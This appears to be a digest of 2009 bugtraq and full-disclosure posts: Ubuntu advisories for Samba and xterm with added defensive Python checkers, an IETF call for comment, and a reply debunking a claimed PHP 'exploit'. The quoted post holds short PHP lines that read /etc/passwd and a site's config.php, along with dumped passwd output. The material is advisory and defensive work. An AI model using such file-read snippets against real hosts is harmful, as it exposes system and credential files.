===========================================================
Ubuntu Security Notice USN-702-1           January 05, 2009
samba vulnerability
CVE-2009-0022
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 8.10

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 8.10:
  samba                           2:3.2.3-1ubuntu3.4

In general, a standard system upgrade is sufficient to effect the
necessary changes.

Details follow:

Gunter Höckel discovered that Samba with registry shares enabled did not
properly validate share names. An authenticated user could gain access to the
root filesystem by using an older version of smbclient and specifying an
empty string as a share name. This is only an issue if registry shares are
enabled on the server by setting "registry shares = yes", "include = registry",
or "config backend = registry", which is not the default.


Updated packages for Ubuntu 8.10:




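A configuration audit for the condition USN-702-1 describes, as an added example that is not part of the advisory or of Samba: it reports which of the three settings named above are active in an smb.conf. The function names and the sample files are constructed for illustration, and it assumes the settings live in the [global] section and that parameter names are matched without regard to case or spacing.

```python
import re

# Values smb.conf treats as boolean true (assumption stated in the lead-in).
TRUE_VALUES = {"yes", "true", "on", "1"}


def parse_smb_conf(text):
    """Parse smb.conf text into {section: {parameter: [values, ...]}}.

    Handles ';' and '#' comment lines, backslash line continuation and
    repeated parameters (an 'include' line may appear more than once).
    """
    sections, current, pending = {}, None, ""
    for raw in text.splitlines():
        line = pending + raw.strip()
        pending = ""
        if line.endswith("\\"):          # continued on the next line
            pending = line[:-1]
            continue
        if not line or line[0] in "#;":  # blank line or comment
            continue
        header = re.fullmatch(r"\[(.*)\]", line)
        if header:
            current = header.group(1).strip().lower()
            sections.setdefault(current, {})
            continue
        if "=" in line and current is not None:
            name, value = line.split("=", 1)
            key = " ".join(name.lower().split())   # normalise case and spacing
            sections[current].setdefault(key, []).append(value.strip())
    return sections


def registry_share_triggers(text):
    """Return the advisory's trigger settings that are active in [global]."""
    g = parse_smb_conf(text).get("global", {})

    def last(key):
        # The last occurrence of a parameter is the one that takes effect.
        return g.get(key, [""])[-1].lower()

    hits = []
    if last("registry shares") in TRUE_VALUES:
        hits.append("registry shares = yes")
    if any(v.lower() == "registry" for v in g.get("include", [])):
        hits.append("include = registry")
    if last("config backend") == "registry":
        hits.append("config backend = registry")
    return hits


# Constructed sample files, not taken from any real host.
SAFE = """\
[global]
   workgroup = EXAMPLE
;  registry shares = yes
   # include = registry
[public]
   path = /srv/public
"""

EXPOSED = """\
[global]
   workgroup = EXAMPLE
   Registry Shares = Yes
   include = /etc/samba/extra.conf
   include = registry
[public]
   path = /srv/public
"""

# Same setting split over two lines with a trailing backslash.
CONTINUED = "[global]\nconfig backend = \\\n    registry\n"

if __name__ == "__main__":
    for name, conf in (("SAFE", SAFE), ("EXPOSED", EXPOSED), ("CONTINUED", CONTINUED)):
        print(name, registry_share_triggers(conf) or "registry shares not enabled")
```

A host that reports any trigger and still runs a samba package older than 2:3.2.3-1ubuntu3.4 on Ubuntu 8.10 is in the affected configuration.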

Date: Mon, 05 Jan 2009 22:43:03 -0300
To: full-disclosure@lists.grok.org.uk, bugtraq@securityfocus.com
From: Fernando Gont <fernando.gont@gmail.com>
Subject: [Suspected Spam]"Security Assessment of the Internet Protocol" & the IETF

Folks,

In August 2008 the UK CPNI (United Kingdom's Centre for the Protection of
National Infrastructure) published the document "Security Assessment of the
Internet Protocol". The motivation of the aforementioned document is
explained in the Preface of the document itself. (The paper is available
at: http://www.cpni.gov.uk/Docs/InternetProtocol.pdf )

Once the paper was published by CPNI, I produced an IETF Internet-Draft
version of the same paper, with the intent of having the IETF publish
recommendations and/or update the specifications where necessary. This IETF
Internet-Draft is available at:
http://www.gont.com.ar/drafts/ip-security/index.html (and of course it's
also available at the IETF I-D repository).

The Internet-Draft I published was aimed at the OPSEC WG. And the Working
Group is right now deciding whether to accept this document as a WG item.
This is certainly a critical step. Having the OPSEC WG accept this document
as a WG item would guarantee to some extent that the IETF will do something
about all this, and would also somehow set a precedent in updating the
specifications of core protocols and/or providing advice on security
aspects of them.

The call for consensus is available at:
http://www.ietf.org/mail-archive/web/opsec/current/msg00373.html . You can
voice your opinion on the relevant mailing-list sending an e-mail to
opsec@ietf.org . You don't need to subscribe to the mailing list to post a
message (although your message will be held for moderator approval before
it is distributed to the list members).

The deadline for posting your opinion is January 9th (next Friday).

Thanks so much!

Kind regards,
Fernando Gont






--
Fernando Gont
e-mail: fernando@gont.com.ar || fgont@acm.org
PGP Fingerprint: 7809 84F5 322E 45C7 F1C9 3945 96EE A9EF D076 FFF1




Date: Tue, 6 Jan 2009 04:36:13 -0800 (PST)
From: Slack Traq <slacktraq@yahoo.com>
Reply-To: slacktraq@yahoo.com
Subject: Re: php 4.x php5.2.x all "show_source()" ,"highlight_file()" bypass
To: bugtraq@securityfocus.com


There is no bug so no exploit can exist. File /etc/passwd is readable by any user (inside PHP with safe_mode disabled also) as it doesn't contain very sensitive information such as user passwords.

Double-check what you are posting before actually doing it, please.

Regards

--- On Sun, 1/4/09, l1un@hotmail.com <l1un@hotmail.com> wrote:

> From: l1un@hotmail.com <l1un@hotmail.com>
> Subject: php 4.x php5.2.x all "show_source()" ,"highlight_file()" bypass
> To: bugtraq@securityfocus.com
> Date: Sunday, January 4, 2009, 11:39 AM
> Author: Super-Crystal
> www.arab4services.net
> safe_mode off (tested)
> <?
> show_source ('/etc/passwd');
> ?>
> Example exploit:
> <?
> show_source ('/home/user/public_html/config.php');
> ?>
> -----------------------------
> highlight_file()

>    <? 
> highlight_file ("/etc/passwd"); 
> ?> 
> exploit !!!  
> <code><span style="color: #000000">
> root:x:0:0:root:/root:/bin/bash<br
> />bin:x:1:1:bin:/bin:/sbin/nologin<br
> />daemon:x:2:2:daemon:/sbin:/sbin/nologin<br
> />adm:x:3:4:adm:/var/adm:/sbin/nologin<br
> />lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin<br
> />sync:x:5:0:sync:/sbin:/bin/sync<br
> />shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown<br
> />halt:x:7:0:halt:/sbin:/sbin/halt<br
> />mail:x:8:12:mail:/var/spool/mail:/sbin/nologin<br
> />news:x:9:13:news:/etc/news:<br
> />uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin<br
> />operator:x:11:0:operator:/root:/sbin/nologin<br
> />games:x:12:100:games:/usr/games:/sbin/nologin<br
> />gopher:x:13:30:gopher:/var/gopher:/sbin/nologin<br
> />ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin<br
> />nobody:x:99:99:Nobody:/:/sbin/nologin<br
> />dbus:x:81:81:System message bus:/:/sbin/nologin<br 
>  
> :)
>  
> greetz:php.net!

> th4nx securityfocus


      

Date: Mon, 5 Jan 2009 17:23:08 -0800
From: Kees Cook <kees@ubuntu.com>
To: ubuntu-security-announce@lists.ubuntu.com
Cc: bugtraq@securityfocus.com, full-disclosure@lists.grok.org.uk
Subject: [USN-703-1] xterm vulnerability

===========================================================
Ubuntu Security Notice USN-703-1           January 06, 2009
xterm vulnerability
CVE-2006-7236, CVE-2008-2383
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS
Ubuntu 7.10
Ubuntu 8.04 LTS
Ubuntu 8.10

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 6.06 LTS:
  xterm                           208-3.1ubuntu3.1

Ubuntu 7.10:
  xterm                           229-1ubuntu0.1

Ubuntu 8.04 LTS:
  xterm                           229-1ubuntu1.1

Ubuntu 8.10:
  xterm                           235-1ubuntu1.1

After a standard system upgrade you need to restart any running xterms to
effect the necessary changes.

Details follow:

Paul Szabo discovered that the DECRQSS escape sequences were not handled
correctly by xterm.  Additionally, window title operations were also not
safely handled.  If a user were tricked into viewing a specially crafted
series of characters while in xterm, a remote attacker could execute
arbitrary commands with user privileges. (CVE-2006-7236, CVE-2008-2382)


Updated packages for Ubuntu 6.06 LTS:


Updated packages for Ubuntu 7.10:


Updated packages for Ubuntu 8.04 LTS:


Updated packages for Ubuntu 8.10:

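A display-side check for the two sequence classes USN-703-1 names, as an added example that is not part of the advisory or of xterm: it flags DECRQSS and window-title operations in untrusted text (a log file, a mail body) and rewrites control characters into visible form before the text reaches a terminal. The byte layouts follow xterm's published control-sequence documentation rather than the advisory, and the function names and the sample string are constructed.

```python
import re

ST = r"(?:\x1b\\|\x9c)"  # String Terminator: ESC \ or the single C1 character

PATTERNS = [
    # DCS <data> ST. DECRQSS is the DCS whose data starts with "$q".
    ("dcs", re.compile(r"(?:\x1bP|\x90)(.*?)" + ST, re.S)),
    # OSC Ps ; text, ended by BEL or ST. Ps 0, 1 and 2 set icon name / title.
    ("osc", re.compile(r"(?:\x1b\]|\x9d)(\d*);?.*?(?:\x07|" + ST + ")", re.S)),
    # CSI Ps t window operations. Ps 20 and 21 report icon label / title.
    ("winop", re.compile(r"(?:\x1b\[|\x9b)([0-9;]*)t")),
]


def scan(text):
    """Return sorted (offset, label) pairs for the sequences of interest."""
    findings = []
    for kind, rx in PATTERNS:
        for m in rx.finditer(text):
            arg = m.group(1)
            if kind == "dcs":
                label = "DECRQSS" if arg.startswith("$q") else "other-DCS"
            elif kind == "osc":
                label = "title-set" if arg in ("0", "1", "2") else None
            else:
                label = "title-report" if arg.split(";")[0] in ("20", "21") else None
            if label:
                findings.append((m.start(), label))
    return sorted(findings)


def neutralise(text):
    """Make every C0/C1 control character visible, keeping tab and newline.

    Works even when a sequence is unterminated and scan() therefore
    cannot match it: without ESC or a C1 introducer nothing is interpreted.
    """
    return re.sub(r"[\x00-\x08\x0b-\x1f\x7f-\x9f]",
                  lambda m: "\\x%02x" % ord(m.group()), text)


# Constructed sample: a benign DECRQSS asking for the SGR state, a title
# change, a title report request and ordinary colour codes.
SAMPLE = ("normal line\n"
          "\x1bP$qm\x1b\\"
          "\x1b]2;constructed title\x07"
          "\x1b[21t"
          "\n\x1b[31mred\x1b[0m\n")

if __name__ == "__main__":
    for offset, label in scan(SAMPLE):
        print(offset, label)
    print(neutralise(SAMPLE))
```

Colour codes such as the SGR sequences in the sample are not reported by `scan`, but `neutralise` still makes them inert, which is the safer default for text of unknown origin.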



